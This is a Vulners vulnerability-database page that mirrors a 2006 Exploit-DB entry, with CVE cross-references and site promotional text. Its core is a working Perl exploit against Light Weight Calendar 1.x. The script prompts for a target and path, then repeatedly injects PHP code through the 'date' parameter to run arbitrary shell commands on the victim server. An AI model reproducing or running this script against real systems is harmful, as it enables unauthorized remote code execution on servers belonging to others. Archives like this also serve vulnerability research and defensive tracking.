Lucene search
+L

Light Weight Calendar 1.x - 'date' Remote Code Execution

🗓️ 09 Mar 2006 00:00:00Reported by Hessam-xType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 61 Views

Light Weight Calendar 1.x - 'date' Remote Code Execution - Exploi

Related
Code
ReporterTitlePublishedViews
Family
checkpoint_advisories
Check Point Advisories
Light Weight Calendar index.php date Parameter PHP Code Execution - Ver2 (CVE-2006-0206)
28 Jan 201400:00
checkpoint_advisories
cve
CVE
CVE-2006-0206
13 Jan 200623:00
cve
cve
CVE
CVE-2006-1252
19 Mar 200601:00
cve
cvelist
Cvelist
CVE-2006-0206
13 Jan 200623:00
cvelist
cvelist
Cvelist
CVE-2006-1252
19 Mar 200601:00
cvelist
euvd
EUVD
EUVD-2006-0214
13 Jan 200623:00
euvd
euvd
EUVD
EUVD-2006-1256
7 Oct 202500:30
euvd
nvd
NVD
CVE-2006-0206
13 Jan 200623:03
nvd
nvd
NVD
CVE-2006-1252
19 Mar 200601:02
nvd
prion
Prion
Sql injection
13 Jan 200623:03
prion
Rows per page
#!/usr/bin/perl
#
# Light Weight Calendar
# Exploit by Hessam-x (www.hessamx.net)
#
######################################################
#  ___ ___                __                         #
# /   |   \_____    ____ |  | __ ___________________ #
#/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / #
#\    Y    // __ \\  \___|    <\  ___/|  | \//    /  #
# \___|_  /(____  /\___  >__|_ \\___  >__|  /_____ \ #
#       \/      \/     \/     \/    \/            \/ #
#             Iran Hackerz Security Team             #
#               WebSite: www.hackerz.ir              #
#                                                    #
######################################################
# Name    : Light Weight Calendar                    #
# version : 1.*                                      #
######################################################
use LWP::Simple;

print "-------------------------------------------\n";
print "=          Light Weight Calendar          =\n";
print "=       By Hessam-x  - www.hackerz.ir     =\n";
print "-------------------------------------------\n\n";

      print "Target(www.example.com)\> ";
      chomp($targ = <STDIN>);

      print "path: (/lwc/)\>";
      chomp($path=<STDIN>);

while()
{

     print "command:\>";
     chomp($comd=<STDIN>);
     $expl="index.php?hx=".$comd."&date=passthru%28%24_GET%5Bhx%5D%29";
     $page=get("http://".$targ.$path.$expl) || die "[-] Exploit failed ...\n";

}

# milw0rm.com [2006-03-09]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Jun 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.04279
61